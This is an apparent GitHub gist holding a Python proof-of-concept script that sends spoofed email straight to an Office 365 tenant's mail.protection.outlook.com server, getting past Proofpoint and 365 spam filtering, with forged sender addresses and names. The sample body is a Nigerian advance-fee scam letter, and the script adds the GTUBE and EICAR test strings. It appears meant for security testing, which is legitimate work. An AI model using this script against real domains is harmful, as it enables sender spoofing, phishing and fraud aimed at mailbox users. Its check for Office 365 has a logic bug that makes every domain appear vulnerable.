Last active
January 24, 2022 13:38
-
-
Save Und3rf10w/6360b1432ff4a766d4047c6f80e1ae98 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python2 | |
| # Example usage: office_365_mail_relay.py --from-addr sender@example.com --to-addr recipient@example.com --domain example.com --subject "SPAM TIME!" --from-name "John Doe" --to-name "John Smith" | |
| # 20170709 - @Und3rf10w | |
| import dns.resolver | |
| import socket | |
| import smtplib | |
| import argparse | |
| from termcolor import cprint | |
| from email.mime.text import MIMEText | |
| from email.mime.multipart import MIMEMultipart | |
| # Required command line arguments: | |
| parser = argparse.ArgumentParser(prog="office_365_mail_relay.py", usage="%(prog)s [options]", description="POC to bypass 365 spam protections from one 365 user to another, including spoofing") | |
| parser.add_argument('--from-addr', help="The address to send the email message from", required=True, dest='fromaddr') | |
| parser.add_argument('--to-addr', help="The address to send the email message to", required=True, dest='toaddr') | |
| parser.add_argument('--domain', help="The domain of an Office 365 user to use", required=True, dest='domain') | |
| # Optional Command line arguments: | |
| parser.add_argument('--smtp-server', help="The *.mail.protection.outlook.com smtp server to use", default=None, dest='smtpserver') | |
| parser.add_argument('--subject', help="The subject line of the test email", default=None, dest='subject') | |
| parser.add_argument('--from-name', help="The name of the email sender", default=None, dest='fromname') | |
| parser.add_argument('--to-name', help="The name of the email recipient", default=None, dest='toname') | |
| parser.add_argument('--eicar', help="Add the eicar test string to the message body", default=False, action='store_true', dest='eicar') | |
| args = parser.parse_args() | |
| argsdict = vars(args) | |
| fromaddr = argsdict['fromaddr'] | |
| toaddr = argsdict['toaddr'] | |
| domain = argsdict['domain'] | |
| subject = argsdict['subject'] | |
| fromname = argsdict['fromname'] | |
| toname = argsdict['toname'] | |
| mx_record = argsdict['smtpserver'] | |
| eicar = argsdict['eicar'] | |
| def office_365_check(domain): | |
| 'Grabs the SPF record for the domain' | |
| for x in dns.resolver.query(domain, 'TXT'): | |
| if 'v=spf' in x.to_text(): | |
| domain_spf = x.to_text() | |
| print "[*] SPF records for " + domain + ": " + domain_spf | |
| if 'protection.outlook.com' or 'sharepointonline.com' in domain_spf: | |
| cprint(("[*] " + domain + " uses Office 365, likely vulnerable to attack"), "green") | |
| return 1 | |
| else: | |
| return 0 | |
| def get_mx_record(domain): | |
| 'Checks for usage of proofpoint for the domain, and grabs an appropriate mx record for the domain' | |
| for x in dns.resolver.query(domain, 'MX'): | |
| domain_mx = x.to_text() | |
| if 'pphosted' in x.to_text(): | |
| cprint(("[*] " + domain + " is protected by proofpoint, attempting to resolve the domain's Office 365 SMTP server for spam bypass"), "yellow") | |
| o365_name = domain.replace(".", "-") + ".mail.protection.outlook.com." | |
| return socket.gethostbyname(o365_name) | |
| else: | |
| print "[*] MX records for " + domain + ": " + domain_mx | |
| mx_records = domain_mx.split() | |
| return socket.gethostbyname(mx_records[1]) | |
| def send_mail_message(mxserver, fromaddr, toaddr, data, **kwargs): | |
| 'Sends a message fromaddr to toaddr using mxserver' | |
| print "[*] Establishing connection to domain's mail server @ " + mxserver | |
| try: | |
| server = smtplib.SMTP(mx_record, 25) | |
| server.helo() | |
| server.sendmail(fromaddr, toaddr, msg.as_string()) | |
| cprint(("\n[*] Email sent"),"green") | |
| except smtplib.SMTPRecipientsRefused as e: | |
| cprint(("\n[!] Error sending to recipient "),"red") | |
| cprint(("[-] Recipient: " + toaddr),"yellow") | |
| cprint(("[-] Message : " + str(e.recipients[toaddr])), "yellow") | |
| except Exception as e: | |
| cprint(("\n[!] Error sending message: "),"red") | |
| cprint(("[-] "+ str(e)), "yellow") | |
| # Add the highly spammy message | |
| body = """Dear Sir, | |
| I have been requested by the Nigerian National Petroleum Company to contact you for assistance in resolving a matter. The Nigerian National Petroleum Company has recently concluded a large number of contracts for oil exploration in the sub-Sahara region. The contracts have immediately produced moneys equaling US$40,000,000. The Nigerian National Petroleum Company is desirous of oil exploration in other parts of the world, however, because of certain regulations of the Nigerian Government, it is unable to move these funds to another region. | |
| You assistance is requested as a non-Nigerian citizen to assist the Nigerian National Petroleum Company, and also the Central Bank of Nigeria, in moving these funds out of Nigeria. If the funds can be transferred to your name, in your United States account, then you can forward the funds as directed by the Nigerian National Petroleum Company. In exchange for your accommodating services, the Nigerian National Petroleum Company would agree to allow you to retain 10%%, or US$4 million of this amount. | |
| However, to be a legitimate transferee of these moneys according to Nigerian law, you must presently be a depositor of at least US$100,000 in a Nigerian bank which is regulated by the Central Bank of Nigeria. | |
| If it will be possible for you to assist us, we would be most grateful. We suggest that you meet with us in person in Lagos, and that during your visit I introduce you to the representatives of the Nigerian National Petroleum Company, as well as with certain officials of the Central Bank of Nigeria. | |
| Please call me at your earliest convenience at 18-467-4975. Time is of the essence in this matter; very quickly the Nigerian Government will realize that the Central Bank is maintaining this amount on deposit, and attempt to levy certain depository taxes on it. | |
| Yours truly, | |
| Prince Alyusi Islassis\r\n""" | |
| # Add the GTUBE test string (http://spamassassin.apache.org/gtube/) | |
| body += "XJS*C4JDBQADN1.NSBN3*2IDNEN*" | |
| body += "GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34\r\n" | |
| if eicar is True: | |
| msg = MIMEMultipart('alternative') | |
| else: | |
| msg = MIMEMultipart() | |
| if fromname is not None: | |
| msg['From'] = "%s <%s>" %(fromname, fromaddr) | |
| else: | |
| msg['From'] = "%s" %(fromaddr) | |
| if toname is not None: | |
| msg['To'] = "%s <%s>" %(toname, toaddr) | |
| else: | |
| msg['To'] = "%s" %(toaddr) | |
| if subject is not None: | |
| msg['Subject'] = "%s" %(subject) | |
| else: | |
| msg['Subject'] = "" | |
| # Add the eicar attachment if option is passed | |
| if eicar is True: | |
| eicar_string = "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-ST" | |
| eicar_string += "ANDARD-ANTIVIRUS-TEST-FILE!$H+H*\r\n" | |
| attachment = MIMEText(eicar_string) | |
| attachment.add_header('Content-Disposition', 'attachment', filename='eicar.txt') | |
| msg.attach(attachment) | |
| content = MIMEText(body, 'plain') | |
| msg.attach(content) | |
| # Check to see whether 'domain' uses office 365 | |
| result = office_365_check(domain) | |
| if result != 1: | |
| cprint(("[*]" + domain + " likely not vulnerable to attack."),"red") | |
| # Resolve the MX record for 'domain' | |
| if mx_record is None: | |
| mx_record = get_mx_record(domain) | |
| # Send the spammy email | |
| send_mail_message(mx_record, fromaddr, toaddr, msg) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment